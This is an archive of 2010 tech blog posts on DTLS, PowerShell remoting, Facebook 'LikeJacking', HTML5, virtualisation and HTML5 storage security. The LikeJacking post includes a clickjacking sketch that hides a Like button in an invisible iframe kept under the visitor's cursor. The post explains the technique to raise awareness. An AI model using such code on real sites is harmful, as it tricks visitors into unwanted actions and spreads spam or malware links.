Tuesday, June 29, 2010

Datagram Transport Layer Security – DTLS

With the never-ending onslaught of mobile technology and greater security awareness, I thought it might be interesting to look at Datagram Transport Layer Security (DTLS). The two main methods of securing internet communication are Transport Layer Security (TLS) and IPsec. TLS is best known for securing HTTP traffic, i.e. HTTPS, but is also used in other areas such as secure IMAP and SMTP. Its main limitation is that it requires a reliable transport channel, normally TCP, and hence is unsuitable for UDP traffic, which today includes Voice over IP and several gaming protocols. IPsec is suitable for UDP traffic but its implementation is far more complicated than TLS as it is designed for peer-to-peer communication rather than client-server.

This led to the emergence of DTLS which, as the name suggests, is Transport Layer Security adapted to run over an unreliable datagram transport such as UDP. A very readable paper on the details can be found here.

One widely available implementation of DTLS is Cisco’s AnyConnect Secure Mobility client. It doesn’t appear to follow the full goals of DTLS, as the key exchange and handshake are carried out over TLS, which results in two channels needing to be maintained.

With the emerging popularity of VoIP clients on smart phones, I expect we shall be hearing more about DTLS over the coming months.

Friday, June 25, 2010

Windows PowerShell Remoting

Windows PowerShell has always offered much promise but, with version 1.0 at least, often failed to deliver when you got into the detail. In contrast, version 2 seems to offer more hope, particularly when combined with the remote management feature that comes as standard with Windows Server 2008 R2 and is available as a download for the original Windows Server 2008.

My evaluation project was to use PowerShell to obtain free disk space, audit failures from the Security event log and an instant processor reading on a couple of remote servers, via a web service over HTTP(S).

The first step was to set up a ‘listener’ on each of the remote servers, for which there is a “quick config” option that automatically alters the relevant services, registry keys and other settings to get you up and running. Making the changes manually isn’t too difficult if the quick config fails, as it did for me.
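
A minimal sketch of that setup step, assuming PowerShell 2.0 on the target servers and run from an elevated session:

```powershell
# Quick config: starts the WinRM service, creates an HTTP listener and
# opens the relevant firewall exception in one go
Enable-PSRemoting -Force

# Much the same thing from an ordinary command prompt
winrm quickconfig
```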

Stage two was to establish a connection, or session, to each of my remote servers from my PC. There are plenty of options at this stage, including authentication and port number, but nothing too complicated. The most difficult part was getting the password used for each session read from a file rather than having to type it in each time. PowerShell doesn’t allow you to store your password in plain text, which, although a ‘good’ thing, hinders testing and evaluation.
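
The approach that worked for me is sketched below, with placeholder server names, account and file path: the password is saved once as an encrypted string and rebuilt into a credential on each run.

```powershell
# One-off: prompt for the password and save it as an encrypted string
# (encrypted with DPAPI, so readable only by this user on this machine)
Read-Host "Password" -AsSecureString |
    ConvertFrom-SecureString | Out-File C:\Scripts\monitor.cred

# Each run: rebuild the credential from the file and open the sessions
$secure   = Get-Content C:\Scripts\monitor.cred | ConvertTo-SecureString
$cred     = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "DOMAIN\monitor", $secure
$sessions = New-PSSession -ComputerName server01, server02 -Credential $cred
```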

The final stage was to issue the commands themselves. This proved to be extremely simple with Invoke-Command, using either PowerShell’s built-in cmdlets or WMI.
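
For example, the three readings I was after can be gathered along these lines (a sketch only, reusing the $sessions variable from the previous step):

```powershell
# Free disk space on local drives
Invoke-Command -Session $sessions -ScriptBlock {
    Get-WmiObject Win32_LogicalDisk -Filter "DriveType=3" |
        Select-Object DeviceID, FreeSpace, Size
}

# Recent audit failures from the Security event log
Invoke-Command -Session $sessions -ScriptBlock {
    Get-EventLog -LogName Security -EntryType FailureAudit -Newest 20
}

# Instant processor reading
Invoke-Command -Session $sessions -ScriptBlock {
    Get-WmiObject Win32_Processor | Select-Object LoadPercentage
}
```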

Of course all of the above has been possible before, even with VBScript, but PowerShell offers some advantages over its predecessors, not least the following.

  • Commands issued to multiple servers run in parallel rather than sequentially.
  • A command can run in the background (see the sketch after this list).
  • PowerShell is extremely good at formatting output, allowing the returned data to be read easily.
  • The remote connection is over HTTP(S) which is useful for servers in remote data centres or even in the cloud, e.g. with Amazon’s EC2.
  • The remote server listener can be configured to expose a limited set of functionality. Hence even someone with administrative credentials is restricted in the information they can gather.
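
As a quick illustration of the first three points, here is a sketch that again reuses the $sessions variable from earlier:

```powershell
# Runs on both servers in parallel, as a background job
$job = Invoke-Command -Session $sessions -AsJob -ScriptBlock {
    Get-WmiObject Win32_Processor | Select-Object LoadPercentage
}

# Collect the results when ready and format them for easy reading
Wait-Job $job | Receive-Job |
    Format-Table PSComputerName, LoadPercentage -AutoSize
```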

My overall impression of PowerShell 2, particularly the remoting feature, is that it is now at a level where it is consistently useful. I’m looking forward to version 3, assuming there will be one.

Monday, June 14, 2010

Like Jacking – Facebook helps to spread the bad news

Facebook has been making the news a lot recently with its so-called abuse of privacy. Although certainly important, it’s kind of naïve to post anything to a social network and expect it to be private forever. I also believe that many people are relaxed about this and some individuals seem positively happy about the fact.

In my opinion LikeJacking poses a bigger threat than weak privacy settings. LikeJacking is based on the Facebook feature that allows webmasters to insert a button on their website which visitors can click if they like the site content. A link back to the site then appears on the visitor’s Facebook page, visible to all their friends. The Like feature is easy to set up and indeed Facebook has a page that will even generate the code for you if you aren’t too hot on HTML and JavaScript.

So far so good, with no apparent danger. The exploit comes from the fact that it isn’t necessary for a visitor to knowingly click a “Like” button for the link to appear on their Facebook page. There is a good example of how to achieve this here. It’s also easy to manipulate the link and the image displayed with it. It’s quite simple to imagine that someone who visits such a site in error, and who has a lot of Facebook friends, could allow the link to spread in an exponential fashion.
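
The underlying trick is classic clickjacking: a page containing a real “Like” button is loaded into an invisible iframe which is kept directly beneath the visitor’s cursor, so whatever they think they are clicking, the click actually lands on the hidden button. A rough sketch of the idea follows; the iframe URL and dimensions are placeholders for illustration, not working exploit code.

```html
<!-- Decoy content the visitor believes they are interacting with -->
<div>Click anywhere to play the video</div>

<!-- Invisible frame containing a page with a real Like button (placeholder URL) -->
<iframe id="hidden-like" src="http://example.com/page-with-like-button"
        style="position:absolute; opacity:0; border:0; width:80px; height:30px;">
</iframe>

<script>
  // Keep the invisible button directly beneath the mouse at all times
  document.onmousemove = function (e) {
    var frame = document.getElementById('hidden-like');
    frame.style.left = (e.pageX - 40) + 'px';
    frame.style.top  = (e.pageY - 15) + 'px';
  };
</script>
```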

The most obvious use of this exploit is for spam. Some people (well, me at least) think that Facebook is exclusively spam from people you know, so what harm will a little bit more do? It is of course simple to manipulate the “Like” link so that it leads to a website that will attempt to install malicious content on your PC, e.g. a keystroke logger or some kind of botnet client, for which the consequences can be far more serious. Plenty of these sites exist, including ones that you might normally trust. This article reports on a number of websites that have been poisoned via SQL injection so that a visit to the site results in an attempt to install malware.

Thursday, June 3, 2010

HTML5 – The Next Best Thing and the End of Flash

Perhaps fed up with all things Cloud, the IT industry hype machine is turning its attention to HTML5. It shouldn’t really be a surprise given that Steve Jobs has been raving about how it can replace Flash and Microsoft sees its implementation as a major selling point for IE9.

When people say HTML5 they often mean CSS3 or one of several other new web technologies. A good explanation of what is and isn’t HTML5 can be found in this blog post from ExtJS.

Despite the hype, HTML5 and related technologies are showing much promise. A good collection of what can be achieved can be found at HTMLWatch. The results are certainly impressive.

Is this really the beginning of the end for Flash? Well, Adobe products in general have been a nightmare from a security point of view over the past year, so a viable alternative might be desirable. However, at least part of the reason that so many vulnerabilities have been found in Flash is its massive installation base and the consequent targeting by hackers. It’s not unreasonable to assume that future versions of Flash will be more secure and that developers who have Flash skills and tools will continue to produce Flash applications.

The real danger to Flash may come from Steve Jobs refusing to allow it on the iPhone and the iPad. Despite the minuscule market share that these products have, they dominate the media agenda. It’s not too difficult to imagine hype beating reason and there being a large-scale move away from Flash to supposedly allow for maximum cross-platform support, irrespective of whether this is really true.

Friday, May 21, 2010

Virtualisation: When is it Right for your Business?

It always strikes me as strange that the IT industry, which you would think was packed full of rational, intelligent people, is so susceptible to marketing and fashion. Amongst others we have had the dotcom boom, WAP, any first version of a Microsoft product and, my all-time favourite, the death of the router due to the invention of the switch. How could we have been so stupid?

As a former boss of mine used to say, “Nobody ever got the sack for buying IBM”. And herein lies the root of the problem. Although many IT professionals claim to be innovative and cutting edge, in reality their main priority is job preservation and so the “safety in numbers” principle kicks in. They invest in the same technology as everyone else, usually whatever has been “bigged up” in the IT press.

The most obvious technology currently benefitting from this sheep mentality is Cloud Computing but, as I’ve blogged on that before, I thought I’d highlight another area doing well out of IT fashion, namely virtualisation.

Virtualisation is useful, does have some real benefits and indeed I use it myself. However, I find it annoying that it is promoted almost as a silver-bullet solution, as if virtualisation is guaranteed to bring lower costs, better scalability and performance, as well as more uptime, irrespective of the application and its uses. All of these points can be true, but more and more I’m coming across cases of companies virtualising large parts of their IT infrastructure without proper analysis of whether or not they will get any real benefit. But enough of the ranting; here are a few things to consider before you start a virtualisation project.

Performance: Something often overlooked is that virtualisation reduces the performance level of your hardware, as there is always some overhead from the virtualisation layer. This is not necessarily a problem if you plan to run a few applications that have low load but still require isolation from each other; in fact this is where virtualisation excels. It may become a problem if your applications have significant usage peaks, as the equivalent performance in a virtualised environment will be less than on a physical system. It’s impossible to quantify exactly what this impact will be, so it is necessary to test your own applications. A couple of examples of such testing can be found at WebPerformance Inc and also Microsoft. Be aware as well that the choice of hardware for the virtualisation platform can have a significant impact; for example, AMD’s Rapid Virtualization Indexing and Intel’s Extended Page Tables are specifically designed to optimise virtualisation.

Cost: The main cost saving from virtualisation comes from requiring less hardware and the associated reduction in power and data centre space. It is possible to get some reasonably powerful virtualisation software for free if certain advanced functionality is not required. What must not be overlooked is the cost of additional licensing, assuming of course you are not using open source software. For example, if you run four virtual Windows Servers on a single VMware ESXi machine you may need to pay for four operating system licences, and the same can apply to other paid software such as databases and anti-malware packages. It may be cheaper to try to get your applications to run on a single system. You may also find that the free hypervisors are not sufficient for your needs, in which case there are licensing costs here as well.

If you want to use some of the more interesting virtualisation features, such as dynamically moving virtual machines between physical servers, it is necessary to have some kind of storage area network (SAN). If your application has significant disk I/O requirements it is better to use Fibre Channel rather than iSCSI, and such an option is significantly more expensive than direct-attached storage. Again, this is not necessarily a problem, but it is important to be sure that you are getting a decent improvement in your service for the money you invest.

Scalability: A big plus point of virtualisation is the way you can dynamically add resources to a virtual machine (VM). Firstly, you can let a busy VM take unused resources from a shared pool. If this is not sufficient, you can dynamically move other virtual machines to different physical hardware, assuming you have made the relevant investment in a SAN and so on, freeing system power for your newly busy application. It sounds great in theory and in some cases it probably is. Once again, however, the true benefit depends on the characteristics of your applications. It would be nice if each application had its peak usage on distinct days at times that were mutually exclusive. In my experience it is more likely that the opposite is true, and so your virtual infrastructure may need to cope with all of your applications experiencing peak load at the same time. Once more, this is not necessarily a problem if you have decided that the convenience of being able to easily move your applications between hardware platforms is worth the investment in the infrastructure.

An unwanted side effect of offering easy hardware upgrades is the tendency for deficiencies in applications to be ignored. If more processing power is easily available, it is tempting to allocate it to a poorly performing application rather than optimising the code or the configuration.

Availability: Virtualisation can help improve the availability of your applications. With the right configuration, and when using a SAN, if a physical server fails all the virtual machines that had been running on it can be brought back up automatically on other hardware. The same is true if you need to take a system down for maintenance, e.g. to add new memory. It sounds great, but again it is important to assess whether your investment is giving you value for money. Do your applications need to be available 24x7x365? Does your SLA allow for a couple of hours’ downtime in order for you to recover a faulty system? How often do you expect your hardware actually to fail? My own experience is that if you run a server less than five years old in an environment with proper temperature control and consistent power then, with the exception of disk drives, which should be protected by RAID, failure is rare. Also consider that a SAN may fail too, which could leave you with a huge single point of failure.

To conclude, virtualisation can add real value to your business, but before implementing it you need to do a proper analysis to see whether what you gain represents true value for money.

Tuesday, May 18, 2010

HTML 5 – Security Challenges

No post recently due to the extreme lack of anything interesting to post about. Finally, yesterday, something turned up via the unlikely source of a LinkedIn group. LinkedIn groups are usually a hotbed of inanity or self-promotion, but the OWASP French Chapter bucked the trend by pointing me in the direction of this HTML 5 article on eWEEK. HTML 5, much in the news recently due to discussions about the H.264 video format, has new features that present some interesting challenges for security. Client-side storage is one area highlighted in the article. HTML 5 allows for three types of client-side storage:

  • Session storage: similar to cookies but able to hold much more information, scoped to a single browser window.
  • Local storage: similar to session storage but available to all browser windows and persistent after a window is closed.
  • Database storage: structured data saved in a real local SQL database.
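
To make that a little more concrete, here is a rough sketch of the three APIs as they stood at the time (the names and values are invented for illustration):

```javascript
// Session storage: scoped to the current browser window
sessionStorage.setItem("basket", JSON.stringify({ items: 3 }));

// Local storage: shared across windows for the same origin and survives closing them
localStorage.setItem("preferences", JSON.stringify({ theme: "dark" }));

// Database storage (Web SQL as then specified): a real local SQL engine
var db = openDatabase("notes", "1.0", "Offline notes", 2 * 1024 * 1024);
db.transaction(function (tx) {
    tx.executeSql("CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)");
    // Parameterised queries matter locally too; string concatenation here would be
    // open to exactly the kind of local SQL injection mentioned below
    tx.executeSql("INSERT INTO notes (body) VALUES (?)", [document.title]);
});
```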

The most obvious security risk that springs to mind is leakage of data left behind after an application is closed, but there are also other possibilities such as cross-site request forgery and perhaps even local SQL injection!

The article also highlights that HTML 5 increases the scope for cross-domain communication by JavaScript, which allows for more powerful applications but also opens up possibilities for abuse.
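
Cross-document messaging is a good illustration: it is reasonably safe if the receiving page checks where each message came from, and wide open to abuse if it doesn’t. A small sketch, with placeholder origins:

```javascript
// Page at http://trusted.example.com embedding a frame from http://partner.example.com
var frame = document.getElementById("partner-frame");
frame.contentWindow.postMessage("hello", "http://partner.example.com"); // name the intended recipient

// Inside the framed page at http://partner.example.com
window.addEventListener("message", function (event) {
    if (event.origin !== "http://trusted.example.com") {
        return; // drop messages from unexpected origins
    }
    // Even from a trusted origin, treat event.data as untrusted input
    console.log("Received: " + event.data);
}, false);
```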

A little extra research suggests that the above features can be implemented securely but, as ever, it depends on the developer’s ability to understand the technology and to be aware of how to code in a secure manner.